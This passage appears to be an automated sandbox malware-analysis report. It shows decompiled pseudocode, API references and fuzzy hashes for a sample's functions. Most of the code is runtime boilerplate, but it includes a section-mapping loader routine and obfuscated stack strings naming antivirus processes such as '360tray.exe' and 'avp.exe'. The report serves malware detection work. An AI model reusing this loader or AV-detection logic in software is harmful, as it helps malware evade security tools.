						_a4 = 0;
						E00425E86( &_v12, _t58,  &_a4);
						_v16 = 0x44257c;
						_t37 = E00429326( &_v16, 0x44ae50);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t74 = _t71 - 8;
						__eflags =  *((intOrPtr*)(__esi + 0x14)) - __ebx;
						_t64 = _t37;
						if(__eflags < 0) {
							E00439296(__ebx, _t64, __esi, __eflags);
						}
						_t39 =  *(_t66 + 0x14) - _t49;
						__eflags = _t39 - _t64;
						if(_t39 < _t64) {
							_t64 = _t39;
						}
						__eflags = _t64;
						if(_t64 > 0) {
							_t53 =  *((intOrPtr*)(_t66 + 0x18));
							__eflags = _t53 - 8;
							_push(_t67);
							_t68 = _t66 + 4;
							if(_t53 < 8) {
								_v20 = _t68;
							} else {
								_v20 =  *_t68;
							}
							__eflags = _t53 - 8;
							if(_t53 < 8) {
								_v16 = _t68;
							} else {
								_v16 =  *_t68;
							}
							E0042581A(_v16 + _t49 * 2, _t53 - _t49 + _t53 - _t49, _v20 + (_t49 + _t64) * 2, _t39 - _t64 + _t39 - _t64);
							_t47 =  *(_t66 + 0x14) - _t64;
							_t74 = _t74 + 0x10;
							__eflags =  *((intOrPtr*)(_t66 + 0x18)) - 8;
							 *(_t66 + 0x14) = _t47;
							if( *((intOrPtr*)(_t66 + 0x18)) >= 8) {
								_t68 =  *_t68;
							}
							 *((short*)(_t68 + _t47 * 2)) = 0;
						}
						return _t66;
					}
				} else {
					_t50 = 0;
					L2:
					return E0040A3C7(0, _t50);
				}
			}

APIs

std::exception::exception.LIBCMT ref: 00404EB9
__CxxThrowException@8.LIBCMT ref: 00404ED0

Part of subcall function 0040A3C7: _malloc.LIBCMT ref: 0040A3E1

Strings

|%D, xrefs: 00404EC8

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: |%D
API String ID: 4063778783-1005067592
Opcode ID: bf1066f8db12241f27cad259936fa25d9ecddff94d56ee684695c7070681de6c
Instruction ID: 84181ef0f3c98cd7a0dbecb84b7eb87c665b1fae3cee699c0b175a9b1c58c635
Opcode Fuzzy Hash: bf1066f8db12241f27cad259936fa25d9ecddff94d56ee684695c7070681de6c
Instruction Fuzzy Hash: 9BE0A0F19143006AD308EE61EA05A1F72946B90714F504A2FB95A401C0EB78DA18C55B

Uniqueness

Uniqueness Score: -1.00%

Function 00412375, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00412375(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				long _t15;
				void* _t16;
				void* _t19;
				intOrPtr _t27;
				void* _t29;

				_t29 = __eflags;
				_t25 = __edi;
				_t21 = __ebx;
				 *__ecx = 0x43e454;
				 *((intOrPtr*)(__ecx + 4)) = 0x43e43c;
				 *((intOrPtr*)(__ecx + 0x10)) = 0x43e424;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xc0000001;
				E00412294(__eax + __eax, __ecx);
				_t15 = InterlockedDecrement(E0040E67F(__ebx, __edi, __esi, _t29) + 0x2c);
				_t30 = _t15;
				if(_t15 != 0) {
					return _t15;
				} else {
					_t16 = E0040E67F(__ebx, __edi, __esi, _t30);
					_t31 =  *((intOrPtr*)(_t16 + 0x30));
					if( *((intOrPtr*)(_t16 + 0x30)) == 0) {
						_push(__esi);
						E004172D3(1);
						_t27 =  *((intOrPtr*)(E0040E67F(__ebx, __edi, __esi, _t31) + 4));
						if(_t27 == 0) {
							L7:
							_t19 = E0040E67F(_t21, _t25, _t27, _t34);
							if( *((char*)(_t19 + 0x14)) == 0) {
								_push(0);
								E0040A85C();
							}
							L9:
							return _t19;
						}
						_t23 =  *((intOrPtr*)(_t27 + 0x20));
						if( *((intOrPtr*)(_t27 + 0x20)) == 0) {
							goto L7;
						}
						_t19 = E00415A74(_t23);
						_t34 = _t19;
						if(_t19 == 0) {
							goto L9;
						}
						_pop(_t27);
						goto ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x20)))) + 0x60)));
					}
					return _t16;
				}
			}

APIs

InterlockedDecrement.KERNEL32(-0000002C), ref: 00417340

Part of subcall function 00415A74: IsWindowEnabled.USER32(?), ref: 00415A7D

Strings

$C, xrefs: 00412382
<C, xrefs: 0041237B

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: DecrementEnabledInterlockedWindow
String ID: $C$<C
API String ID: 274451516-850035360
Opcode ID: a0d94b76c2d1f4a01be27591ce7af6b42832f873ebca6b851fdeca541fe66ec3
Instruction ID: 164d0060cba68d6e93367d34be95611aa99bf9100a4ba4629f16b0e317ed376d
Opcode Fuzzy Hash: a0d94b76c2d1f4a01be27591ce7af6b42832f873ebca6b851fdeca541fe66ec3
Instruction Fuzzy Hash: 57F0AF30609204CFDB20AF22D504B9A3770BF28308B54559FAC555F283CB7AC882DA9E

Uniqueness

Uniqueness Score: -1.00%

Function 00439296, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00439296(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t23;
				void* _t25;
				void* _t26;

				_push(0x44);
				E004271DA(E0043B787, __ebx, __edi, __esi);
				E00404BA0(_t25 - 0x28, "invalid string position");
				_t2 = _t25 - 4;
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				E00402380( *_t2, _t25 - 0x28);
				 *((intOrPtr*)(_t25 - 0x50)) = 0x4425a0;
				E00429326(_t25 - 0x50, 0x44ad30);
				asm("int3");
				_push(__esi);
				_t23 = _t25 - 0x50;
				E00404B20( *((intOrPtr*)(_t26 + 8)));
				 *_t23 = 0x4425a0;
				return _t23;
			}

0x00439296
0x0043929d
0x004392aa
0x004392af
0x004392af
0x004392ba
0x004392c8
0x004392cf
0x004392d4
0x004392d5
0x004392da
0x004392dc
0x004392e1
0x004392ea

APIs

__EH_prolog3.LIBCMT ref: 0043929D
__CxxThrowException@8.LIBCMT ref: 004392CF

Part of subcall function 00429326: RaiseException.KERNEL32(0040E68E,0040D295,00401099,00000000,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00429366

Part of subcall function 00404B20: std::exception::exception.LIBCMT ref: 00404B4E

Strings

invalid string position, xrefs: 004392A2

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
String ID: invalid string position
API String ID: 2977319401-1799206989
Opcode ID: a0dead978ffa22cc3ec2f08a1646e5ce2a0f171a1519555e087de7d4516feaca
Instruction ID: 9b7cf93e3289814e30c34a05105a03ca4e7ee4b0338e8657069acaa4db1b400a
Opcode Fuzzy Hash: a0dead978ffa22cc3ec2f08a1646e5ce2a0f171a1519555e087de7d4516feaca
Instruction Fuzzy Hash: EDE0A0B1910224ABD704EBD1D912BCEB774AF04315F80442FF600A61C0DBBC9904C76C

Uniqueness

Uniqueness Score: -1.00%

Function 0043234C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043234C(char _a4, char _a5, char _a6, char _a7) {
				char _t7;
				int _t10;

				_t7 = _a4;
				if(_t7 != 0) {
					_a4 = _t7 + 0x40;
					_a5 = 0x3a;
					_a6 = 0x5c;
					_a7 = 0;
					_t10 = GetDriveTypeA( &_a4);
					if(_t10 == 0 || _t10 == 1) {
						return 0;
					} else {
						goto L1;
					}
				} else {
					L1:
					return 1;
				}
			}

0x0043234f
0x00432354
0x0043235d
0x00432364
0x00432368
0x0043236c
0x00432370
0x00432378
0x00432382
0x00000000
0x00000000
0x00000000
0x00432356
0x00432356
0x0043235a
0x0043235a

APIs

GetDriveTypeA.KERNEL32(?,?,00432398,?,00000000,00000007,00000007,?,004324DD,00000000,?,?,0044AB80,0000000C,00429BC7,?), ref: 00432370

Strings

\, xrefs: 00432368
:, xrefs: 00432364

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: DriveType
String ID: :$\
API String ID: 338552980-1166558509
Opcode ID: f8e6be13d6ba430bb602b8a03233094e85b1ca8a1b42d3b51957b1443deddea4
Instruction ID: f03fe9a4c226c62422eb4ac5c849c9a89233c8494341cf437215e01ab4b653f9
Opcode Fuzzy Hash: f8e6be13d6ba430bb602b8a03233094e85b1ca8a1b42d3b51957b1443deddea4
Instruction Fuzzy Hash: 9BE048302182C99EEF51CAB8944479B3FCC9B15688F04C056EC4CCE241D279D6568759

Uniqueness

Uniqueness Score: -1.00%

Function 0043401E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043401E(intOrPtr _a4) {
				intOrPtr _t2;
				struct _CRITICAL_SECTION* _t3;
				void* _t8;
				void* _t11;

				_t2 = _a4;
				if(_t2 < 0x450050 || _t2 > 0x4502b0) {
					_t3 = _t2 + 0x20;
					EnterCriticalSection(_t3);
					return _t3;
				} else {
					return E0042E21D(_t8, _t11, (_t2 - 0x450050 >> 5) + 0x10);
				}
			}

0x0043401e
0x00434029
0x00434042
0x00434046
0x0043404c
0x00434032
0x00434041
0x00434041

APIs

__lock.LIBCMT ref: 0043403B

Part of subcall function 0042E21D: __mtinitlocknum.LIBCMT ref: 0042E231
Part of subcall function 0042E21D: __amsg_exit.LIBCMT ref: 0042E23D
Part of subcall function 0042E21D: EnterCriticalSection.KERNEL32(?,?,8E7DE579,00426365,00000004,0044A750,0000000C,0042AD44,?,?,00000000,00000000,00000000,0042A9E6,00000001,00000214), ref: 0042E245

EnterCriticalSection.KERNEL32(?,00438CD1,?,0044AC88,0000000C,00435B3F,7E,0044AC20,00000010,00434011), ref: 00434046

Strings

7E, xrefs: 00434022

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterSection$__amsg_exit__lock__mtinitlocknum
String ID: 7E
API String ID: 3996875869-1921024439
Opcode ID: 5ee011d4127c05a3920557b945f1eec68f0cc03963047ce96b5ba83e0b90b22d
Instruction ID: 45d79c944ec6ecba58149c0d1167831e74b6b92a05ff45d78256a86fbc25496b
Opcode Fuzzy Hash: 5ee011d4127c05a3920557b945f1eec68f0cc03963047ce96b5ba83e0b90b22d
Instruction Fuzzy Hash: BCD0237970010147DF1C55716D8960E2219D184343F745C9FF901C33C3C51DE840480D

Uniqueness

Uniqueness Score: -1.00%

Function 1000C071, Relevance: 5.1, APIs: 4, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C071(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v12;
				int _v16;
				intOrPtr _t28;
				signed int _t36;
				long _t38;
				void* _t41;
				intOrPtr* _t43;
				void* _t44;
				void* _t49;
				int* _t50;
				void* _t51;

				_t43 = _a12;
				_v8 = _v8 & 0x00000000;
				_v12 =  *((intOrPtr*)(_t43 + 4));
				_t28 =  *_t43;
				_t49 = ( *(_t28 + 0x14) & 0x0000ffff) + _t28 + 0x18;
				if( *((short*)(_t28 + 6)) <= 0) {
					return _t28;
				}
				_t50 = _t49 + 0x10;
				do {
					if( *_t50 != 0) {
						_t44 = VirtualAlloc( *((intOrPtr*)(_t50 - 4)) + _v12,  *_t50, 0x1000, 4);
						memcpy(_t44, _t50[1] + _a4,  *_t50);
						 *(_t50 - 8) = _t44;
						_t43 = _a12;
						_t51 = _t51 + 0xc;
					} else {
						_t38 =  *(_a8 + 0x38);
						_v16 = _t38;
						if(_t38 > 0) {
							_t41 = VirtualAlloc( *((intOrPtr*)(_t50 - 4)) + _v12, _t38, 0x1000, 4);
							 *(_t50 - 8) = _t41;
							memset(_t41, 0, _v16);
							_t51 = _t51 + 0xc;
						}
					}
					_v8 = _v8 + 1;
					_t50 =  &(_t50[0xa]);
					_t36 =  *( *_t43 + 6) & 0x0000ffff;
				} while (_v8 < _t36);
				return _t36;
			}

0x1000c078
0x1000c07b
0x1000c083
0x1000c086
0x1000c091
0x1000c095
0x1000c119
0x1000c119
0x1000c098
0x1000c0a0
0x1000c0a3
0x1000c0eb
0x1000c0f5
0x1000c0fb
0x1000c0fe
0x1000c101
0x1000c0a5
0x1000c0a8
0x1000c0ad
0x1000c0b0
0x1000c0bd
0x1000c0c6
0x1000c0cc
0x1000c0d2
0x1000c0d2
0x1000c0b0
0x1000c106
0x1000c109
0x1000c10c
0x1000c110
0x00000000

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00000000), ref: 1000C0BD
memset.MSVCRT ref: 1000C0CC
VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00000000), ref: 1000C0E3
memcpy.MSVCRT ref: 1000C0F5

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AllocVirtual$memcpymemset
String ID:
API String ID: 2542864682-0
Opcode ID: 2985b22a25bce345e41094b069c1c7491c6a4c2463a77723e93fc60065e363b8
Instruction ID: 62e91f6f7af89bf456184a36cd5ee6cf0595e6d3ca236538cf30c62401683bdc
Opcode Fuzzy Hash: 2985b22a25bce345e41094b069c1c7491c6a4c2463a77723e93fc60065e363b8
Instruction Fuzzy Hash: 0D21E471A00218EFEB10CF99CC89F9AB7F8EF08345F148459FA49DB252D371A994CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00416D9B, Relevance: 5.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416D9B(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x4527c8
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

APIs

EnterCriticalSection.KERNEL32(004527C8,?,?,?,00417272,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00416DA4
TlsGetValue.KERNEL32(004527AC,?,?,?,00417272,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00416DB9
LeaveCriticalSection.KERNEL32(004527C8,?,?,?,00417272,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00416DCF
LeaveCriticalSection.KERNEL32(004527C8,?,?,?,00417272,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00416DDA

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: a56e631e3aa457ee629124fe4acb795626ab1bb145ef033a5e8c6a30349a66d0
Instruction ID: acb2667af657152517e0210f05c6bcde1b5850910fe74e2ab9ba8b304d2b49c3
Opcode Fuzzy Hash: a56e631e3aa457ee629124fe4acb795626ab1bb145ef033a5e8c6a30349a66d0
Instruction Fuzzy Hash: B5F0827A300210AFD720AF64FC8889773AAEF84371317992EE40297211D735F845CB54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Vwxyab.exe PID: 5028 Parent PID: 1488 Vwxyab.exeCOMMON

Executed Functions

Function 10009067, Relevance: 397.1, APIs: 156, Strings: 70, Instructions: 1584
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10009067(void* __eflags) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				char _v139;
				char _v140;
				char _v141;
				char _v142;
				char _v143;
				char _v144;
				char _v145;
				char _v146;
				char _v147;
				char _v148;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				char _v231;
				char _v232;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				char _v282;
				char _v283;
				char _v284;
				char _v285;
				char _v286;
				char _v287;
				char _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				char _v293;
				char _v294;
				char _v295;
				char _v296;
				char _v297;
				char _v298;
				char _v299;
				char _v300;
				char _v301;
				char _v302;
				char _v303;
				char _v304;
				char _v305;
				char _v306;
				char _v307;
				char _v308;
				char _v309;
				char _v310;
				char _v311;
				char _v312;
				char _v313;
				char _v314;
				char _v315;
				char _v316;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				char _v329;
				char _v330;
				char _v331;
				char _v332;
				char _v333;
				char _v334;
				char _v335;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				char _v353;
				char _v354;
				char _v355;
				char _v356;
				char _v357;
				char _v358;
				char _v359;
				char _v360;
				char _v361;
				char _v362;
				char _v363;
				char _v364;
				char _v365;
				char _v366;
				char _v367;
				char _v368;
				char _v369;
				char _v370;
				char _v371;
				char _v372;
				char _v373;
				char _v374;
				char _v375;
				char _v376;
				char _v377;
				char _v378;
				char _v379;
				char _v380;
				char _v381;
				char _v382;
				char _v383;
				char _v384;
				char _v385;
				char _v386;
				char _v387;
				char _v388;
				char _v389;
				char _v390;
				char _v391;
				char _v392;
				char _v393;
				char _v394;
				char _v395;
				char _v396;
				char _v397;
				char _v398;
				char _v399;
				char _v400;
				char _v401;
				char _v402;
				char _v403;
				char _v404;
				char _v405;
				char _v406;
				char _v407;
				char _v408;
				char _v409;
				char _v410;
				char _v411;
				char _v412;
				char _v416;
				char _v417;
				char _v418;
				char _v419;
				char _v420;
				char _v421;
				char _v422;
				char _v423;
				char _v424;
				char _v425;
				char _v426;
				char _v427;
				char _v428;
				char _v432;
				char _v433;
				char _v434;
				char _v435;
				char _v436;
				char _v437;
				char _v438;
				char _v439;
				char _v440;
				char _v441;
				char _v442;
				char _v443;
				char _v444;
				char _v448;
				char _v449;
				char _v450;
				char _v451;
				char _v452;
				char _v453;
				char _v454;
				char _v455;
				char _v456;
				char _v457;
				char _v458;
				char _v459;
				char _v460;
				char _v464;
				char _v465;
				char _v466;
				char _v467;
				char _v468;
				char _v469;
				char _v470;
				char _v471;
				char _v472;
				char _v473;
				char _v474;
				char _v475;
				char _v476;
				char _v480;
				char _v481;
				char _v482;
				char _v483;
				char _v484;
				char _v485;
				char _v486;
				char _v487;
				char _v488;
				char _v489;
				char _v490;
				char _v491;
				char _v492;
				char _v496;
				char _v497;
				char _v498;
				char _v499;
				char _v500;
				char _v501;
				char _v502;
				char _v503;
				char _v504;
				char _v505;
				char _v506;
				char _v507;
				char _v508;
				char _v512;
				char _v513;
				char _v514;
				char _v515;
				char _v516;
				char _v517;
				char _v518;
				char _v519;
				char _v520;
				char _v521;
				char _v522;
				char _v523;
				char _v524;
				char _v528;
				char _v529;
				char _v530;
				char _v531;
				char _v532;
				char _v533;
				char _v534;
				char _v535;
				char _v536;
				char _v537;
				char _v538;
				char _v539;
				char _v540;
				char _v544;
				char _v545;
				char _v546;
				char _v547;
				char _v548;
				char _v549;
				char _v550;
				char _v551;
				char _v552;
				char _v553;
				char _v554;
				char _v555;
				char _v556;
				char _v560;
				char _v561;
				char _v562;
				char _v563;
				char _v564;
				char _v565;
				char _v566;
				char _v567;
				char _v568;
				char _v569;
				char _v570;
				char _v571;
				char _v572;
				char _v576;
				char _v577;
				char _v578;
				char _v579;
				char _v580;
				char _v581;
				char _v582;
				char _v583;
				char _v584;
				char _v585;
				char _v586;
				char _v587;
				char _v588;
				char _v591;
				char _v592;
				char _v593;
				char _v594;
				char _v595;
				char _v596;
				char _v597;
				char _v598;
				char _v599;
				char _v600;
				char _v601;
				char _v602;
				char _v603;
				char _v604;
				char _v606;
				char _v607;
				char _v608;
				char _v609;
				char _v610;
				char _v611;
				char _v612;
				char _v613;
				char _v614;
				char _v615;
				char _v616;
				char _v617;
				char _v618;
				char _v619;
				char _v620;
				char _v621;
				char _v622;
				char _v623;
				char _v624;
				char _v625;
				char _v626;
				char _v627;
				char _v628;
				char _v629;
				char _v630;
				char _v631;
				char _v632;
				char _v633;
				char _v634;
				char _v635;
				char _v636;
				char _v639;
				char _v640;
				char _v641;
				char _v642;
				char _v643;
				char _v644;
				char _v645;
				char _v646;
				char _v647;
				char _v648;
				char _v649;
				char _v650;
				char _v651;
				char _v652;
				char _v653;
				char _v654;
				char _v655;
				char _v656;
				char _v658;
				char _v659;
				char _v660;
				char _v661;
				char _v662;
				char _v663;
				char _v664;
				char _v665;
				char _v666;
				char _v667;
				char _v668;
				char _v669;
				char _v670;
				char _v671;
				char _v672;
				char _v673;
				char _v674;
				char _v675;
				char _v676;
				char _v677;
				char _v678;
				char _v679;
				char _v680;
				void* _t741;
				void* _t743;
				void* _t745;
				void* _t747;
				void* _t749;
				void* _t751;
				void* _t753;
				void* _t755;
				void* _t757;
				void* _t759;
				void* _t761;
				void* _t763;
				void* _t765;
				void* _t767;
				void* _t769;
				void* _t771;
				void* _t773;
				void* _t775;
				void* _t777;
				void* _t779;
				void* _t781;
				void* _t783;
				void* _t785;
				void* _t787;
				void* _t789;
				void* _t791;
				void* _t793;
				void* _t795;
				void* _t797;
				void* _t799;
				void* _t801;
				void* _t803;
				void* _t805;
				void* _t807;
				void* _t809;
				void* _t811;
				void* _t813;
				void* _t815;
				void* _t817;
				void* _t819;
				void* _t821;
				void* _t823;
				void* _t825;
				void* _t827;
				void* _t829;
				void* _t831;
				void* _t833;
				void* _t835;
				void* _t837;
				void* _t839;
				void* _t841;
				int _t1108;
				void* _t1110;
				void* _t1111;

				_v376 = 0x33;
				_v375 = 0x36;
				_v374 = 0x30;
				_v373 = 0x74;
				_v372 = 0x72;
				_v371 = 0x61;
				_v370 = 0x79;
				_v369 = 0x2e;
				_v368 = 0x65;
				_v367 = 0x78;
				_v366 = 0x65;
				_v365 = 0;
				_v48 = 0x61;
				_v47 = 0x76;
				_v46 = 0x70;
				_v45 = 0x2e;
				_v44 = 0x65;
				_v43 = 0x78;
				_v42 = 0x65;
				_v41 = 0;
				_v328 = 0x4b;
				_v327 = 0x76;
				_v326 = 0x4d;
				_v325 = 0x6f;
				_v324 = 0x6e;
